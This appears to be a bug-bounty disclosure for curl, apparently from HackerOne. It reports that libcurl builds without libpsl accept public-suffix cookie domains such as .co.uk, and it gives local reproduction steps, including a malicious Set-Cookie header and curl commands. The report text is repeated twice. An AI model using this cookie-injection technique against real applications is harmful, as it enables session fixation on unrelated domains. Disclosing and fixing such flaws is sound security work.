Description
Summary:
When libcurl is built without libpsl, Domain attribute validation accepts public suffixes like .co.uk, allowing a malicious host to plant cookies that are later sent to unrelated sibling domains using the same cookie jar. AI assistance was used to draft this report.
Steps to Reproduce:
1) Build curl without libpsl (e.g., `./configure --disable-shared --without-libpsl && make -j`; confirm `curl --version` lists no PSL feature).
2) Run a local HTTP server that sets `Set-Cookie: sess=attack; Domain=.co.uk; Path=/` when the Host header starts with attacker.co.uk (example: `/tmp/curl/cookie_server.py 8000 <logpath>`).
3) Store cookies: `/tmp/curl/src/curl -v --resolve attacker.co.uk:8000:127.0.0.1 http://attacker.co.uk:8000/ -c /tmp/cjar2`.
4) Reuse the cookie jar on a different host: `/tmp/curl/src/curl -v --resolve victim.co.uk:8000:127.0.0.1 http://victim.co.uk:8000/ -b /tmp/cjar2`.
5) Observe `Cookie: sess=attack` sent to victim.co.uk and `.co.uk` stored in the jar (see `artifacts/cookie_server.log` and `artifacts/cookie_jar_public_suffix.txt`).
Impact:
A malicious server can inject cookies scoped to public suffixes and have them sent to unrelated domains, enabling session fixation or request poisoning in applications that reuse a shared cookie jar across multiple domains.
## Impact
Look at original report impact
When libcurl is built without libpsl, Domain attribute validation accepts public suffixes like .co.uk, allowing a malicious host to plant cookies that are later sent to unrelated sibling domains using the same cookie jar. AI assistance was used to draft this report.
Steps to Reproduce:
1) Build curl without libpsl (e.g., `./configure --disable-shared --without-libpsl && make -j`; confirm `curl --version` lists no PSL feature).
2) Run a local HTTP server that sets `Set-Cookie: sess=attack; Domain=.co.uk; Path=/` when the Host header starts with attacker.co.uk (example: `/tmp/curl/cookie_server.py 8000 <logpath>`).
3) Store cookies: `/tmp/curl/src/curl -v --resolve attacker.co.uk:8000:127.0.0.1 http://attacker.co.uk:8000/ -c /tmp/cjar2`.
4) Reuse the cookie jar on a different host: `/tmp/curl/src/curl -v --resolve victim.co.uk:8000:127.0.0.1 http://victim.co.uk:8000/ -b /tmp/cjar2`.
5) Observe `Cookie: sess=attack` sent to victim.co.uk and `.co.uk` stored in the jar (see `artifacts/cookie_server.log` and `artifacts/cookie_jar_public_suffix.txt`).
Impact:
A malicious server can inject cookies scoped to public suffixes and have them sent to unrelated domains, enabling session fixation or request poisoning in applications that reuse a shared cookie jar across multiple domains.
## Impact
Look at original report impact
Basic Information
ID
H1:3475472
Published
Dec 22, 2025 at 16:34
Modified
Dec 25, 2025 at 16:54